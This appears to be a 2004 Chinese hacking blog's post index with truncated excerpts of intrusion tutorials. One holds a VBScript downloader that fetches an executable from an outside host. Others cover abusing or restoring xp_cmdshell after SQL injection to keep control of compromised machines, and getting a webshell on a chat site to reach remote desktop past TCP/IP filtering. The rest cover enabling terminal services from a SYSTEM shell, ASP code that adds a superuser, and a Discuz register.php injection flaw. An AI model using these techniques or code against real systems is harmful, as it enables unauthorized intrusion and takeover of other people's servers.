- 博客(8)
- 资源 (2)
- 收藏
- 关注
原创 cmd下载文件方法
Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://www.xx.com/dc.exe",0 下载文件的地址xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open()
2004-12-30 19:28:00 6041
原创 当SA遇到XP_CMDSHELL时
有时候在入侵的时候总是碰到先烦恼的问题,比如SA遇到xp_cmdshell时,如果管理员把xp_cmdshell删了怎么办呢?总是眼看着肉鸡跑了吧!今天我就对XP_CMDSHELL做一先解释,希望大家能看明白,能看懂众所周知,在MSSQL中,通过XP_cmdshell存储扩展,拥护具有sysadmin权限,用来执行系统任意命令但是那先网管也不是吃素的,都回把它删除,所以在SQL Injection
2004-12-30 19:25:00 1544
原创 深入挖掘Windows脚本技术
得益于com技术的支持,WSH能提供比批处理(.bat)更强大的功能。说白了,wsh不过是调用现成的“控件”作为一个对象,用对象的属性和方法实现目的。 常用的对象有: WScript Windows脚本宿主对象模型的根对象,要使用WSH自然离不开它。它提供多个子对象,比如WScript.Arguments和WScript.Shell。前者提供对整个命令行参数集的访问,后者可以运行程序、操纵注册表内
2004-12-30 17:44:00 1029
原创 突破TCP/IP筛选到3389终端登陆
一:得到webshell今天晚上的一次小小测试,由于本人太菜,再高深的技术我也不会,只能这样了..........一切都已经过去了,没有办法补图了,希望能看的懂这个小帖子。今天有是无聊的一天,晚上实在无聊没有事情干,就到一个视频聊天站点看秀,嘿嘿~突然发现一个聊天室特别的火暴,人数已经有500人在里面了(满员了),刷了n次也没有进去..........更加郁闷了!:(想想反正也是没有事情做,测试一
2004-12-29 03:07:00 1766
原创 绿色开启终端的简单方法
今天介绍的这种开终端的方法,绿色,环保,无污染~~不须上传任何文件开启终端的方法适合win2k,xp,2003.本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~在无须传任何文件的情况下开启终端服务。 一、win 2k下终端开启终端首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:echo Windows Registry Ed
2004-12-29 02:55:00 827
原创 蓝屏的原创添加超级用户的.asp代码
[转载]蓝屏的原创添加超级用户的.asp代码 凯文改进 Ms未公布的漏洞信息来源:冰点论坛作者:凯文 (kevin1986).network对象脚本权限提升漏洞利用工具用户:密码: if request.servervariables("REMOTE_ADDR") response.write "iP !s n0T RiGHt"else if request("username")
2004-12-26 14:48:00 882
原创 DISCUZ漏洞与提升权限
DISCUZ漏洞与提升权限这个漏洞是孟兄发现的,我在这里感谢他!也感谢ANGEL的分析!DISCUZ 2.2F的这个漏洞在register.php 的代码中:有如下代码: $email = trim($email); if(!$doublee && strstr($email, @)) { $emailadd = "OR email=$email";}
2004-12-17 16:30:00 6980
原创 扩展储存过程被删除以后可以有很简单的办法恢复
★Dbcc的一个用法扩展储存过程被删除以后可以有很简单的办法恢复:比如:删除DROP PROCEDURE sp_addextendedprocDROP PROCEDURE sp_OACreateexec sp_dropextendedproc xp_cmdshell恢复dbcc addextendedproc ("sp_OACreate","odsole70.dll")dbcc addexte
2004-12-08 15:15:00 880
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人